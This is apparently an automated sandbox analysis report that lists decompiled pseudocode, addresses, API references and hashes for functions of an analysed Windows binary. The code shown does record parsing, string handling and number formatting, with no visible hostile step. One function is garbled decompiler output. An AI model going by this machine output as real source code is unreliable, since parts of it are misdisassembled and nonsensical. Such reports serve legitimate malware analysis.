0x0043b210
0x00000000
0x0043b20e
0x0043b1fa
0x0043b1fe
0x0043b201
0x0043b203
0x0043b203
0x0043b206
0x0043b208
0x0043b213
0x0043b213
0x00000000
0x00000000
0x00000000
0x00000000
0x0043b208
0x0043b1e5
0x0043b1e9
0x0043b1ec
0x0043b1ee
0x0043b1ee
0x0043b1f1
0x0043b1f4
0x00000000
0x00000000
0x00000000
0x00000000
0x0043b1f4
0x00000000
0x0043b1d7
0x0043b0ca
0x0043b0ca
0x0043b0ca
0x0043b0ce
0x0043b0d2
0x0043b0d2
0x0043b0d7
0x0043b0db
0x0043b156
0x0043b156
0x0043b15a
0x0043b15d
0x0043b15f
0x0043b15f
0x0043b162
0x0043b166
0x00000000
0x0043b168
0x0043b168
0x0043b16c
0x00000000
0x00000000
0x0043b16e
0x0043b172
0x0043b176
0x0043b176
0x0043b17e
0x0043b181
0x00000000
0x0043b183
0x0043b189
0x0043b18e
0x0043b18e
0x00000000
0x0043b18e
0x0043b181
0x0043b0dd
0x0043b0dd
0x0043b0e1
0x0043b0e5
0x0043b0e5
0x0043b0ea
0x0043b0ee
0x00000000
0x0043b0f0
0x0043b0f0
0x0043b0f4
0x0043b0f8
0x0043b0ff
0x0043b103
0x0043b107
0x0043b107
0x0043b10c
0x0043b110
0x0043b118
0x0043b118
0x0043b11c
0x0043b120
0x0043b120
0x0043b12b
0x0043b12e
0x0043b12e
0x0043b12e
0x0043b131
0x00000000
0x0043b112
0x0043b112
0x0043b116
0x0043b133
0x0043b133
0x0043b137
0x0043b13a
0x0043b13c
0x0043b13c
0x0043b13f
0x0043b143
0x0043b145
0x0043b149
0x0043b14c
0x0043b14e
0x0043b14e
0x0043b151
0x0043b151
0x00000000
0x0043b143
0x00000000
0x0043b116
0x0043b110
0x0043b0fa
0x00000000
0x0043b0fa
0x0043b0ee
0x0043b18f
0x0043b191
0x0043b19b
0x0043b1a0
0x0043b1a0
0x0043b1a8
0x0043b1aa
0x0043b1ac
0x0043b1b0
0x0043b1b3
0x0043b1b5
0x0043b1b5
0x0043b1b8
0x0043b1bc
0x0043b1c1
0x0043b1be
0x0043b1be
0x0043b1be
0x0043b1bc
0x00000000
0x0043b1aa
0x0043b0c4
0x0043b019
0x0043b019
0x0043b01c
0x0043b020
0x0043b020
0x0043b025
0x0043b029
0x0043b030
0x0043b034
0x0043b038
0x0043b038
0x0043b03d
0x0043b041
0x00000000
0x0043b043
0x0043b043
0x00000000
0x0043b043
0x0043b02b
0x0043b02b
0x0043b046
0x0043b046
0x0043b046
0x0043b049
0x0043b04c
0x00000000
0x0043b04c
0x0043b029
0x0043afb8
0x0043afb8
0x0043afb9
0x0043afba
0x0043afbd
0x0043afbe
0x0043afbf
0x0043afc2
0x0043b530
0x0043b535
0x0043b535

APIs

__EH_prolog3_GS.LIBCMT ref: 0043AF90

Part of subcall function 0043A33D: __EH_prolog3_GS.LIBCMT ref: 0043A344

Strings

$, xrefs: 0043B263

Memory Dump Source

Source File: 00000000.00000002.289784623.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.289780882.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.289895062.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.289910874.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.289915647.0000000000466000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_555.jbxd

Similarity

API ID: H_prolog3_
String ID: $
API String ID: 2427045233-3993045852
Opcode ID: cf0a60b0dd4c7f41f13deef3b3ebaefb7990e39159bf838b37bcb2a50591253a
Instruction ID: 74ae83996f6da1bbe9a8551bb5c44ece88bf4926416ae49ce98d665a425cddca
Opcode Fuzzy Hash: cf0a60b0dd4c7f41f13deef3b3ebaefb7990e39159bf838b37bcb2a50591253a
Instruction Fuzzy Hash: 5912C730E047888EEF269BA584557AEBBB1EF19308F04A44FD5921B382C7AC5D45C79E

Uniqueness

Uniqueness Score: -1.00%

Function 00414220 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 185
COMMON

Download Yara Rule

C-Code - Quality: 88%

			E00414220(intOrPtr __ecx, void* __eflags, signed char* _a4, intOrPtr _a8, intOrPtr _a12) {
				char _v8;
				intOrPtr _v16;
				char _v20;
				char _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				signed int _v36;
				signed int _v40;
				char _v68;
				intOrPtr _v72;
				intOrPtr _v76;
				intOrPtr _v80;
				intOrPtr _v84;
				intOrPtr _v88;
				intOrPtr _v92;
				intOrPtr _v96;
				intOrPtr _v100;
				intOrPtr _v104;
				intOrPtr _v108;
				intOrPtr _v112;
				char _v120;
				void* _v148;
				char _v152;
				char _v156;
				intOrPtr _v160;
				intOrPtr _v164;
				intOrPtr _v168;
				intOrPtr _t114;
				intOrPtr _t119;
				intOrPtr _t122;
				intOrPtr _t137;
				intOrPtr _t144;
				signed char* _t159;
				intOrPtr _t180;
				intOrPtr _t198;
				void* _t199;
				void* _t200;
				void* _t206;

				_push(0xffffffff);
				_push(E0044EA03);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t198;
				_t199 = _t198 - 0x98;
				_v160 = __ecx;
				E00418380(_v160, __eflags);
				_v24 = 0;
				_v20 = 0;
				while(1) {
					_t180 = _a12;
					_t114 = E00427900(_a8, _t180, 0x80, 0);
					_v168 = _t114;
					_v164 = _t180;
					_t206 = _v20 - _v164;
					if(_t206 > 0) {
						break;
					}
					if(_t206 < 0) {
						L5:
						_v32 = E00423BC0(_v24, _v20, 0x80, 0);
						_v28 = _t180;
						_v40 = 0x20;
						E004034A0( &_v68);
						_v8 = 0;
						_t27 = _v32 + 0x40; // 0x40
						_t119 = E00413040( &(_a4[_t27]));
						_t200 = _t199 + 4;
						_v72 = _t119;
						if(_v72 > 0x40) {
							_v72 = 0x40;
						}
						_v156 = 0;
						while(1) {
							asm("cdq");
							asm("adc edx, [ebp-0x18]");
							if((_a4[_v156 + _v32] & 0x000000ff) == 0 || _v156 >= _v72) {
								break;
							}
							asm("cdq");
							asm("adc edx, [ebp-0x18]");
							E00403B10( &_v68, 1, _a4[_v156 + _v32] & 0x000000ff);
							_v156 = _v156 + 2;
						}
						_t122 = _v32;
						_t159 = _a4;
						__eflags = ( *(_t159 + _t122) & 0x000000ff) - 0x20;
						if(( *(_t159 + _t122) & 0x000000ff) < 0x20) {
							_v40 =  *_a4 & 0x000000ff;
							E00402DA0( &_v68, 0, 1);
						}
						asm("adc eax, 0x0");
						_v36 = _a4[_v32 + 0x42] & 0x000000ff;
						E004144D0( &_v152);
						_v8 = 1;
						__eflags = _v36;
						_v152 = 0 | _v36 != 0x00000000;
						E00404E30( &_v68);
						_t67 = _v32 + 0x74; // 0x74
						_v104 = E00413060( &(_a4[_t67]));
						_v100 = 0;
						_t73 = _v32 + 0x78; // 0x78
						_v112 = E00413060( &(_a4[_t73]));
						_v108 = 0;
						_t79 = _v32 + 0x44; // 0x44
						_v96 = E00413060( &(_a4[_t79]));
						_v92 = 0;
						_t85 = _v32 + 0x48; // 0x48
						_v88 = E00413060( &(_a4[_t85]));
						_v84 = 0;
						_t91 = _v32 + 0x4c; // 0x4c
						_t137 = E00413060( &(_a4[_t91]));
						_t199 = _t200 + 0x14;
						_v80 = _t137;
						_v76 = 0;
						__eflags = _v36 - 2;
						_v120 = 0 | _v36 != 0x00000002;
						__eflags = _v36 - 2;
						if(_v36 != 2) {
							__eflags = _v36 - 1;
							if(_v36 != 1) {
								__eflags = _v36 - 5;
								if(_v36 != 5) {
									_v152 = 0;
								}
							}
						}
						__eflags = _v72 - 1;
						if(_v72 < 1) {
							_v152 = 0;
						}
						E00418280(_v160,  &_v152);
						_v8 = 0;
						E0041E420( &_v152);
						_v8 = 0xffffffff;
						E004034C0( &_v68);
						_t144 = _v24 + 1;
						__eflags = _t144;
						asm("adc ecx, 0x0");
						_v24 = _t144;
						continue;
					} else {
						_t180 = _v24;
						if(_t180 < _v168) {
							goto L5;
						}
					}
					break;
				}
				 *[fs:0x0] = _v16;
				return _t114;
			}

0x00414223
0x00414225
0x00414230
0x00414231
0x00414238
0x0041423e
0x0041424a
0x0041424f
0x00414256
0x00414271
0x00414278
0x00414280
0x00414285
0x0041428b
0x00414294
0x0041429a
0x00000000
0x00000000
0x004142a0
0x004142b1
0x004142c5
0x004142c8
0x004142cb
0x004142d5
0x004142da
0x004142e7
0x004142ec
0x004142f1
0x004142f4
0x004142fb
0x004142fd
0x004142fd
0x00414304
0x0041431f
0x00414325
0x00414329
0x00414335
0x00000000
0x00000000
0x00414348
0x0041434c
0x0041435c
0x00414319
0x00414319
0x00414363
0x00414366
0x0041436d
0x00414370
0x00414378
0x00414382
0x00414382
0x00414390
0x0041439a
0x004143a3
0x004143a8
0x004143ae
0x004143b5
0x004143c5
0x004143d0
0x004143df
0x004143e2
0x004143eb
0x004143fa
0x004143fd
0x00414406
0x00414415
0x00414418
0x00414421
0x00414430
0x00414433
0x0041443c
0x00414441
0x00414446
0x0041444b
0x0041444e
0x00414453
0x0041445a
0x0041445d
0x00414461
0x00414463
0x00414467
0x00414469
0x0041446d
0x0041446f
0x0041446f
0x0041446d
0x00414467
0x00414476
0x0041447a
0x0041447c
0x0041447c
0x00414490
0x00414495
0x0041449f
0x004144a4
0x004144ae
0x00414262
0x00414262
0x00414268
0x0041426b
0x00000000
0x004142a2
0x004142a2
0x004142ab
0x00000000
0x00000000
0x004142ab
0x00000000
0x004142a0
0x004144bb
0x004144c5

APIs

__aulldiv.LIBCMT ref: 00414280

Strings

@, xrefs: 004142FD
, xrefs: 004142CB

Memory Dump Source

Source File: 00000000.00000002.289784623.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.289780882.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.289895062.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.289910874.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.289915647.0000000000466000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_555.jbxd

Similarity

API ID: __aulldiv
String ID: $@
API String ID: 3732870572-1077428164
Opcode ID: fd07e30c11406a940c5870eaa0ad75007a5591df21856084f9d527c41f80422d
Instruction ID: 29e0209ca00d37d69fb4033038b005b3a64109ed7a606dd8991b362af68689ba
Opcode Fuzzy Hash: fd07e30c11406a940c5870eaa0ad75007a5591df21856084f9d527c41f80422d
Instruction Fuzzy Hash: 31815EB0D04219CFDB14DFA5C891BEEBBB1BF84308F10819EE51967286D7386A85CF95

Uniqueness

Uniqueness Score: -1.00%

Function 0044A122 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 108
COMMON

Download Yara Rule

C-Code - Quality: 53%

			E0044A122(void* __eax, intOrPtr* __ebx, signed int __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				signed char _t37;
				char _t42;
				intOrPtr _t46;
				intOrPtr _t58;
				signed char* _t59;
				signed char _t61;
				signed char _t63;
				void* _t71;
				void* _t74;
				intOrPtr* _t75;
				intOrPtr* _t76;
				void* _t77;

				_push(ss);
				_push(ss);
				_push(ss);
				_t37 = __eax +  *__ebx + 5;
				_push(ss);
				_push(ss);
				_push(ss);
				_push(es);
				_push(ss);
				_push(ss);
				_push(ss);
				es = ss;
				 *__ecx =  *__ecx | __ecx;
				_t61 = __ecx |  *__ecx;
				_push(ss);
				_push(ss);
				_push(ss);
				_push(ss);
				_push(ss);
				_push(ss);
				 *_t61 =  *_t61 + _t37;
				_push(cs);
				_push(ss);
				_push(ss);
				asm("movups xmm2, [esi]");
				asm("adc [esi], edx");
				asm("adc dl, [esi]");
				asm("adc [esi], dl");
				_push(ss);
				asm("adc edx, [edx+0x34b8306a]");
				 *_t76 =  *_t76 + (_t37 | 0x1601161f);
				E00425719(_t37 | 0x1601161f, __ebx, __edi, __esi);
				_t58 =  *((intOrPtr*)(_t76 + 0x1c));
				 *(_t76 - 0x24) =  *(_t76 - 0x24) & 0x00000000;
				asm("movsd");
				 *(_t76 - 0x3c) = _t61;
				 *((intOrPtr*)(_t76 - 0x38)) =  *((intOrPtr*)(_t76 + 8));
				asm("movsb");
				 *((intOrPtr*)(_t76 - 0x20)) = 0xf;
				 *(_t76 - 0x34) = 0;
				_t42 =  *((intOrPtr*)(_t76 + 0x24));
				 *(_t76 - 4) =  *(_t76 - 4) & 0x00000000;
				if(_t42 != 0) {
					 *((char*)(_t76 - 0x16)) = _t42;
					 *((char*)(_t76 - 0x15)) =  *((intOrPtr*)(_t76 + 0x20));
				} else {
					 *((char*)(_t76 - 0x16)) =  *((intOrPtr*)(_t76 + 0x20));
				}
				_t71 = 0x10;
				while(1) {
					E00403B10(_t76 - 0x34, _t71, 0);
					_t46 =  *((intOrPtr*)( *(_t76 - 0x3c) + 8));
					_t63 =  *(_t76 - 0x34);
					if( *((intOrPtr*)(_t76 - 0x20)) < 0x10) {
						_t63 = _t76 - 0x34;
					}
					_t74 = E0044D32F(_t63,  *(_t76 - 0x24), _t76 - 0x18, _t58, _t46);
					_t77 = _t77 + 0x14;
					if(_t74 != 0) {
						break;
					}
					_t71 = _t71 + _t71;
				}
				_t59 =  *(_t76 - 0x34);
				if( *((intOrPtr*)(_t76 - 0x20)) < 0x10) {
					_t59 = _t76 - 0x34;
				}
				while(1) {
					_t74 = _t74 - 1;
					if(_t74 == 0) {
						break;
					}
					_t59 =  &(_t59[1]);
					E00402750(_t76 + 0xc,  *_t59 & 0x000000ff);
				}
				_t75 =  *((intOrPtr*)(_t76 - 0x38));
				 *_t75 =  *((intOrPtr*)(_t76 + 0xc));
				 *((intOrPtr*)(_t75 + 4)) =  *((intOrPtr*)(_t76 + 0x10));
				E00402E20(_t76 - 0x34, 1, 0);
				return E00425763(_t59, _t71, _t75);
			}

0x0044a124
0x0044a125
0x0044a126
0x0044a127
0x0044a129
0x0044a12a
0x0044a12b
0x0044a12c
0x0044a12d
0x0044a12e
0x0044a12f
0x0044a131
0x0044a132
0x0044a136
0x0044a13a
0x0044a13b
0x0044a13c
0x0044a13d
0x0044a13e
0x0044a13f
0x0044a140
0x0044a149
0x0044a14a
0x0044a14b
0x0044a14c
0x0044a14f
0x0044a151
0x0044a153
0x0044a155
0x0044a156
0x0044a15d
0x0044a160
0x0044a168
0x0044a16b
0x0044a177
0x0044a178
0x0044a17b
0x0044a17e
0x0044a17f
0x0044a186
0x0044a18a
0x0044a18d
0x0044a193
0x0044a19d
0x0044a1a3
0x0044a195
0x0044a198
0x0044a198
0x0044a1a8
0x0044a1a9
0x0044a1af
0x0044a1bb
0x0044a1be
0x0044a1c1
0x0044a1c3
0x0044a1c3
0x0044a1d5
0x0044a1d7
0x0044a1dc
0x00000000
0x00000000
0x0044a1de
0x0044a1de
0x0044a1e6
0x0044a1e9
0x0044a1eb
0x0044a1eb
0x0044a1fd
0x0044a1fd
0x0044a1fe
0x00000000
0x00000000
0x0044a1f0
0x0044a1f8
0x0044a1f8
0x0044a203
0x0044a206
0x0044a212
0x0044a215
0x0044a221

APIs

__EH_prolog3_GS.LIBCMT ref: 0044A160
__cftoe.LIBCMT ref: 0044A1D0

Strings

!%x, xrefs: 0044A16F

Memory Dump Source

Source File: 00000000.00000002.289784623.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.289780882.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.289895062.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.289910874.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.289915647.0000000000466000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_555.jbxd

Similarity

API ID: H_prolog3___cftoe
String ID: !%x
API String ID: 855520168-1893981228
Opcode ID: 7f4ad0f7617d6ed03ec4bfbaae2181b6da228f0e00854fa4b5f6fe696e938465
Instruction ID: 396e8ff6b9756241b08351f84aa2a52c7fd289fbc332f4cd1f3b21f4264a7ea8
Opcode Fuzzy Hash: 7f4ad0f7617d6ed03ec4bfbaae2181b6da228f0e00854fa4b5f6fe696e938465
Instruction Fuzzy Hash: 10312838805388AFDF12DFA4EC41AEDBFB1AF05354F14054AF8C02B252C378AA85CB65

Uniqueness

Uniqueness Score: -1.00%

Function 00403CB0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 108
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 100%

			E00403CB0(intOrPtr* __ecx, intOrPtr _a4, intOrPtr _a8) {
				intOrPtr _t15;
				intOrPtr* _t16;
				char* _t22;
				intOrPtr* _t27;
				intOrPtr* _t28;
				intOrPtr _t33;
				intOrPtr _t38;
				intOrPtr _t47;
				intOrPtr* _t52;

				_t33 = _a4;
				_t52 = __ecx;
				if(_t33 == 0) {
					L12:
					_t47 = _a8;
					if(_t47 > 0xfffffffe) {
						E0040DF21("string too long");
					}
					_t15 =  *((intOrPtr*)(_t52 + 0x14));
					if(_t15 >= _t47) {
						if(_t47 != 0) {
							goto L16;
						} else {
							 *((intOrPtr*)(_t52 + 0x10)) = _t47;
							if(_t15 < 0x10) {
								_t22 = _t52;
								 *_t22 = 0;
								return _t22;
							} else {
								 *((char*)( *_t52)) = 0;
								return _t52;
							}
						}
					} else {
						E00402F60(_t52, _t47,  *((intOrPtr*)(_t52 + 0x10)));
						if(_t47 == 0) {
							L26:
							return _t52;
						} else {
							L16:
							if( *((intOrPtr*)(_t52 + 0x14)) < 0x10) {
								_t16 = _t52;
							} else {
								_t16 =  *_t52;
							}
							E004224A0(_t16, _t33, _t47);
							 *((intOrPtr*)(_t52 + 0x10)) = _t47;
							if( *((intOrPtr*)(_t52 + 0x14)) < 0x10) {
								 *((char*)(_t52 + _t47)) = 0;
								goto L26;
							} else {
								 *((char*)( *_t52 + _t47)) = 0;
								return _t52;
							}
						}
					}
				} else {
					_t38 =  *((intOrPtr*)(__ecx + 0x14));
					if(_t38 < 0x10) {
						_t27 = __ecx;
					} else {
						_t27 =  *__ecx;
					}
					if(_t33 < _t27) {
						goto L12;
					} else {
						if(_t38 < 0x10) {
							_t28 = _t52;
						} else {
							_t28 =  *_t52;
						}
						if( *((intOrPtr*)(_t52 + 0x10)) + _t28 <= _t33) {
							goto L12;
						} else {
							if(_t38 < 0x10) {
								return E00403BC0(_t52, _t52, _t33 - _t52, _a8);
							} else {
								return E00403BC0(_t52, _t52, _t33 -  *_t52, _a8);
							}
						}
					}
				}
			}

0x00403cb1
0x00403cb6
0x00403cba
0x00403d15
0x00403d16
0x00403d1d
0x00403d24
0x00403d24
0x00403d29
0x00403d2e
0x00403d4c
0x00000000
0x00403d4e
0x00403d4e
0x00403d54
0x00403d64
0x00403d67
0x00403d6b
0x00403d56
0x00403d59
0x00403d60
0x00403d60
0x00403d54
0x00403d30
0x00403d37
0x00403d3e
0x00403d98
0x00403d9d
0x00403d40
0x00403d40
0x00403d44
0x00403d6e
0x00403d46
0x00403d46
0x00403d46
0x00403d73
0x00403d7f
0x00403d82
0x00403d94
0x00000000
0x00403d84
0x00403d86
0x00403d8f
0x00403d8f
0x00403d82
0x00403d3e
0x00403cbc
0x00403cbc
0x00403cc2
0x00403cc8
0x00403cc4
0x00403cc4
0x00403cc4
0x00403ccc
0x00000000
0x00403cce
0x00403cd1
0x00403cd7
0x00403cd3
0x00403cd3
0x00403cd3
0x00403ce0
0x00000000
0x00403ce2
0x00403ce5
0x00403d12
0x00403ce7
0x00403cfb
0x00403cfb
0x00403ce5
0x00403ce0
0x00403ccc

APIs

std::_Xinvalid_argument.LIBCPMT ref: 00403D24
_memmove.LIBCMT ref: 00403D73

Part of subcall function 00403BC0: std::_Xinvalid_argument.LIBCPMT ref: 00403BDA

Strings

string too long, xrefs: 00403D1F

Memory Dump Source

Source File: 00000000.00000002.289784623.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.289780882.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.289895062.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.289910874.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.289915647.0000000000466000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_555.jbxd

Similarity

API ID: Xinvalid_argumentstd::_$_memmove
String ID: string too long
API String ID: 2168136238-2556327735
Opcode ID: eac05114aa8569671f041ad646bc19c0ea036d405e5c90cb7714e7d77230e793
Instruction ID: fccb2996dc19d66c3795746c24628c1a5e168c9f72d8923c2f5555fc6e81732f
Opcode Fuzzy Hash: eac05114aa8569671f041ad646bc19c0ea036d405e5c90cb7714e7d77230e793
Instruction Fuzzy Hash: 3B3190323106105BD7249E5CA58492BEBEDEF96B12F20493FF191E72D1C778AD4483A9

Uniqueness

Uniqueness Score: -1.00%

Function 0044B8A9 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 88
COMMON

Download Yara Rule

C-Code - Quality: 66%

			E0044B8A9(void* __ebx, intOrPtr __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				signed char _t42;
				int _t44;
				intOrPtr _t56;
				void* _t62;
				void* _t64;
				intOrPtr _t66;
				void* _t67;
				signed long long* _t68;
				signed long long* _t69;
				signed long long _t77;

				_t62 = __edx;
				_t56 = __ecx;
				_push(0x5c);
				E00425719(E004503E8, __ebx, __edi, __esi);
				asm("fldz");
				_t42 =  *(_t67 + 0x18);
				_t66 =  *((intOrPtr*)(_t67 + 8));
				asm("fcom st0, st1");
				 *(_t67 - 0x64) = _t42;
				 *((intOrPtr*)(_t67 - 0x68)) = __ecx;
				 *((char*)(_t67 - 0x60)) = 0;
				asm("fnstsw ax");
				st1 =  *((long long*)(_t67 + 0x20));
				if((_t42 & 0x00000005) == 0) {
					 *((char*)(_t67 - 0x60)) = 1;
					asm("fchs");
				}
				_t77 =  *0x451730;
				 *((intOrPtr*)(_t67 - 0x58)) = 0;
				asm("fcom st0, st1");
				asm("fnstsw ax");
				if((_t42 & 0x00000041) != 0) {
					while(1) {
						__eflags =  *((intOrPtr*)(_t67 - 0x58)) - 0x1388;
						if( *((intOrPtr*)(_t67 - 0x58)) >= 0x1388) {
							goto L3;
						}
						asm("fxch st0, st1");
						 *((intOrPtr*)(_t67 - 0x58)) =  *((intOrPtr*)(_t67 - 0x58)) + 0xa;
						_t77 = _t77 /  *0x451728;
						asm("fcom st0, st1");
						asm("fnstsw ax");
						__eflags = _t42 & 0x00000001;
						if((_t42 & 0x00000001) == 0) {
							asm("fxch st0, st1");
							continue;
						} else {
							st1 = _t77;
						}
						goto L8;
					}
					goto L3;
				} else {
					L3:
					st0 = _t77;
				}
				L8:
				 *((intOrPtr*)(_t67 - 0x40)) = 0xf;
				 *((intOrPtr*)(_t67 - 0x44)) = 0;
				 *((char*)(_t67 - 0x54)) = 0;
				 *_t68 = _t77;
				 *((intOrPtr*)(_t67 - 4)) = 0;
				_t44 = swprintf(_t67 - 0x38, 0x28, "%.0Lf", _t56, _t56);
				_t69 =  &(_t68[2]);
				_t64 = 0;
				 *(_t67 - 0x5c) = _t44;
				if(_t44 > 0) {
					do {
						E00403B10(_t67 - 0x54, 1,  *(_t67 + _t64 - 0x38) & 0x000000ff);
						_t64 = _t64 + 1;
						_t75 = _t64 -  *(_t67 - 0x5c);
					} while (_t64 <  *(_t67 - 0x5c));
				}
				E00403B10(_t67 - 0x54,  *((intOrPtr*)(_t67 - 0x58)), 0x30);
				_t70 = _t69 - 0x1c;
				 *(_t67 - 0x5c) = _t69 - 0x1c;
				E00404800(_t70, _t67 - 0x54);
				_push( *((intOrPtr*)(_t67 - 0x60)));
				_push( *((intOrPtr*)(_t67 + 0x1c)));
				_push( *(_t67 - 0x64));
				_push( *((intOrPtr*)(_t67 + 0x14)));
				_push( *((intOrPtr*)(_t67 + 0x10)));
				_push( *((intOrPtr*)(_t67 + 0xc)));
				_push(_t66);
				E0044B16E(0, _t62, _t64, _t66, _t75);
				E00402E20(_t67 - 0x54, 1, 0);
				return E00425763(0, _t64, _t66);
			}

0x0044b8a9
0x0044b8a9
0x0044b8a9
0x0044b8b0
0x0044b8b5
0x0044b8b7
0x0044b8bd
0x0044b8c0
0x0044b8c2
0x0044b8c7
0x0044b8ca
0x0044b8cd
0x0044b8cf
0x0044b8d4
0x0044b8d6
0x0044b8da
0x0044b8da
0x0044b8dc
0x0044b8e2
0x0044b8e5
0x0044b8e7
0x0044b8ec
0x0044b8f4
0x0044b8f4
0x0044b8fb
0x00000000
0x00000000
0x0044b8fd
0x0044b8ff
0x0044b903
0x0044b909
0x0044b90b
0x0044b90d
0x0044b910
0x0044b8f2
0x00000000
0x0044b912
0x0044b912
0x0044b912
0x00000000
0x0044b910
0x00000000
0x0044b8ee
0x0044b8ee
0x0044b8ee
0x0044b8ee
0x0044b914
0x0044b914
0x0044b91b
0x0044b91e
0x0044b923
0x0044b931
0x0044b934
0x0044b939
0x0044b93c
0x0044b93e
0x0044b943
0x0044b945
0x0044b950
0x0044b955
0x0044b956
0x0044b956
0x0044b945
0x0044b963
0x0044b968
0x0044b970
0x0044b974
0x0044b979
0x0044b97f
0x0044b982
0x0044b985
0x0044b988
0x0044b98b
0x0044b98e
0x0044b98f
0x0044b99a
0x0044b9a6

APIs

__EH_prolog3_GS.LIBCMT ref: 0044B8B0
swprintf.LIBCMT ref: 0044B934

Strings

%.0Lf, xrefs: 0044B926

Memory Dump Source

Source File: 00000000.00000002.289784623.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.289780882.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.289895062.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.289910874.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.289915647.0000000000466000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_555.jbxd

Similarity

API ID: H_prolog3_swprintf
String ID: %.0Lf
API String ID: 472742393-1402515088
Opcode ID: 8f0061de0a2e946c0abc805f3709aa4fd50b873fdfe7f8641696eb606f1f011a
Instruction ID: 29bcd3332fb1d0873c79845961050dd87c1757b34392c0cc5d29ffb17d6e94cd
Opcode Fuzzy Hash: 8f0061de0a2e946c0abc805f3709aa4fd50b873fdfe7f8641696eb606f1f011a
Instruction Fuzzy Hash: 8D31DE71E00308AADF02EFD4C946ACD7F74FB04300F10841AF905AB296D7398A59CF99

Uniqueness

Uniqueness Score: -1.00%

Function 0041425F Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 72
COMMON

Download Yara Rule

C-Code - Quality: 90%

			E0041425F() {
				intOrPtr _t110;
				intOrPtr _t171;
				void* _t189;
				void* _t200;

				L0:
				while(1) {
					L0:
					asm("adc ecx, 0x0");
					 *((intOrPtr*)(_t189 - 0x14)) =  *((intOrPtr*)(_t189 - 0x14)) + 1;
					_t171 =  *((intOrPtr*)(_t189 + 0x10));
					_t110 = E00427900( *((intOrPtr*)(_t189 + 0xc)), _t171, 0x80, 0);
					 *((intOrPtr*)(_t189 - 0xa4)) = _t110;
					 *((intOrPtr*)(_t189 - 0xa0)) = _t171;
					_t200 =  *((intOrPtr*)(_t189 - 0x10)) -  *((intOrPtr*)(_t189 - 0xa0));
					if(_t200 > 0) {
						break;
					}
					L2:
					if(_t200 < 0) {
						L4:
						 *((intOrPtr*)(_t189 - 0x1c)) = E00423BC0( *((intOrPtr*)(_t189 - 0x14)),  *((intOrPtr*)(_t189 - 0x10)), 0x80, 0);
						 *((intOrPtr*)(_t189 - 0x18)) = _t171;
						 *(_t189 - 0x24) = 0x20;
						E004034A0(_t189 - 0x40);
						 *((intOrPtr*)(_t189 - 4)) = 0;
						_t23 =  *((intOrPtr*)(_t189 - 0x1c)) + 0x40; // 0x40
						 *((intOrPtr*)(_t189 - 0x44)) = E00413040( &(( *(_t189 + 8))[_t23]));
						if( *((intOrPtr*)(_t189 - 0x44)) > 0x40) {
							 *((intOrPtr*)(_t189 - 0x44)) = 0x40;
						}
						 *((intOrPtr*)(_t189 - 0x98)) = 0;
						while(1) {
							L8:
							asm("cdq");
							asm("adc edx, [ebp-0x18]");
							if((( *(_t189 + 8))[ *((intOrPtr*)(_t189 - 0x98)) +  *((intOrPtr*)(_t189 - 0x1c))] & 0x000000ff) == 0 ||  *((intOrPtr*)(_t189 - 0x98)) >=  *((intOrPtr*)(_t189 - 0x44))) {
								break;
							}
							L10:
							asm("cdq");
							asm("adc edx, [ebp-0x18]");
							E00403B10(_t189 - 0x40, 1, ( *(_t189 + 8))[ *((intOrPtr*)(_t189 - 0x98)) +  *((intOrPtr*)(_t189 - 0x1c))] & 0x000000ff);
							 *((intOrPtr*)(_t189 - 0x98)) =  *((intOrPtr*)(_t189 - 0x98)) + 2;
						}
						L11:
						if((( *(_t189 + 8))[ *((intOrPtr*)(_t189 - 0x1c))] & 0x000000ff) < 0x20) {
							 *(_t189 - 0x24) =  *( *(_t189 + 8)) & 0x000000ff;
							E00402DA0(_t189 - 0x40, 0, 1);
						}
						asm("adc eax, 0x0");
